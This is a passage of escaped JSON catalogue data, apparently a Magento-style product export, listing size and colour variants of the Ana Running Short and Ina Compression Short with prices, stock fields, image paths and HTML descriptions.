wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"40\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ana-running-short-28-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh10-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh10-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh10-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh10-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh10-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"White\"},\"1967\":{\"sku\":\"WSH10-29-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ana Running Short-29-Black\",\"description\":\"<p>Time to lace up your kicks and beat that personal best in the Ana Running Short. It\'s designed with breathable mesh side panels to help keep you cool while you master the miles.<\\/p>\\n<p>&bull; Black\\/pink two-layer shorts.<br \\/>&bull; Low-rise elastic waistband.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ultra-lightweight fabric. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"40\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ana-running-short-29-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh10-black_alt1.jpg,\\/w\\/s\\/wsh10-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh10-black_alt1.jpg,\\/w\\/s\\/wsh10-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Black\"},\"1968\":{\"sku\":\"WSH10-29-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ana Running Short-29-Orange\",\"description\":\"<p>Time to lace up your kicks and beat that personal best in the Ana Running Short. It\'s designed with breathable mesh side panels to help keep you cool while you master the miles.<\\/p>\\n<p>&bull; Black\\/pink two-layer shorts.<br \\/>&bull; Low-rise elastic waistband.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ultra-lightweight fabric. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"40\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ana-running-short-29-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh10-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh10-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh10-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh10-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh10-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Orange\"},\"1969\":{\"sku\":\"WSH10-29-White\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ana Running Short-29-White\",\"description\":\"<p>Time to lace up your kicks and beat that personal best in the Ana Running Short. It\'s designed with breathable mesh side panels to help keep you cool while you master the miles.<\\/p>\\n<p>&bull; Black\\/pink two-layer shorts.<br \\/>&bull; Low-rise elastic waistband.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ultra-lightweight fabric. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"40\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ana-running-short-29-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh10-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh10-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh10-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh10-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh10-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"White\"},\"1970\":{\"sku\":\"WSH10\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ana Running Short\",\"description\":\"<p>Time to lace up your kicks and beat that personal best in the Ana Running Short. It\'s designed with breathable mesh side panels to help keep you cool while you master the miles.<\\/p>\\n<p>&bull; Black\\/pink two-layer shorts.<br \\/>&bull; Low-rise elastic waistband.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ultra-lightweight fabric. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"40\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Basic,material=CoolTech&trade;|Organic Cotton|Polyester,pattern=Solid-Highlight,climate=All-weather|Warm,eco_collection=Yes,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WSH10-28-Black,size=28,color=Black|sku=WSH10-28-Orange,size=28,color=Orange|sku=WSH10-28-White,size=28,color=White|sku=WSH10-29-Black,size=29,color=Black|sku=WSH10-29-Orange,size=29,color=Orange|sku=WSH10-29-White,size=29,color=White\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh10-black_alt1.jpg,\\/w\\/s\\/wsh10-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh10-black_alt1.jpg,\\/w\\/s\\/wsh10-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Basic\",\"material\":\"CoolTech&trade;|Organic Cotton|Polyester\",\"pattern\":\"Solid-Highlight\",\"climate\":\"All-weather|Warm\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1971\":{\"sku\":\"WSH11-28-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Ina Compression Short-28-Blue\",\"description\":\"<p>One of Luma\'s most popular items, the Ina Compression Short has you covered with exceptional support and comfort, whether you\'re running the trail, riding a bike or ripping out reps. The ventilating fabric offers cool relief and prevents irritating chafing.<\\/p>\\n<p>&bull; Royal blue bike shorts.<br \\/>&bull; Compression fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Anti-microbial. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ina-compression-short-28-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh11-blue_back.jpg\",\"image\":\"\\/w\\/s\\/wsh11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Blue\"},\"1972\":{\"sku\":\"WSH11-28-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Ina Compression Short-28-Orange\",\"description\":\"<p>One of Luma\'s most popular items, the Ina Compression Short has you covered with exceptional support and comfort, whether you\'re running the trail, riding a bike or ripping out reps. The ventilating fabric offers cool relief and prevents irritating chafing.<\\/p>\\n<p>&bull; Royal blue bike shorts.<br \\/>&bull; Compression fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Anti-microbial. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ina-compression-short-28-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Orange\"},\"1973\":{\"sku\":\"WSH11-28-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Ina Compression Short-28-Red\",\"description\":\"<p>One of Luma\'s most popular items, the Ina Compression Short has you covered with exceptional support and comfort, whether you\'re running the trail, riding a bike or ripping out reps. The ventilating fabric offers cool relief and prevents irritating chafing.<\\/p>\\n<p>&bull; Royal blue bike shorts.<br \\/>&bull; Compression fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Anti-microbial. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ina-compression-short-28-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Red\"},\"1974\":{\"sku\":\"WSH11-29-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Ina Compression Short-29-Blue\",\"description\":\"<p>One of Luma\'s most popular items, the Ina Compression Short has you covered with exceptional support and comfort, whether you\'re running the trail, riding a bike or ripping out reps. The ventilating fabric offers cool relief and prevents irritating chafing.<\\/p>\\n<p>&bull; Royal blue bike shorts.<br \\/>&bull; Compression fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Anti-microbial. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ina-compression-short-29-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\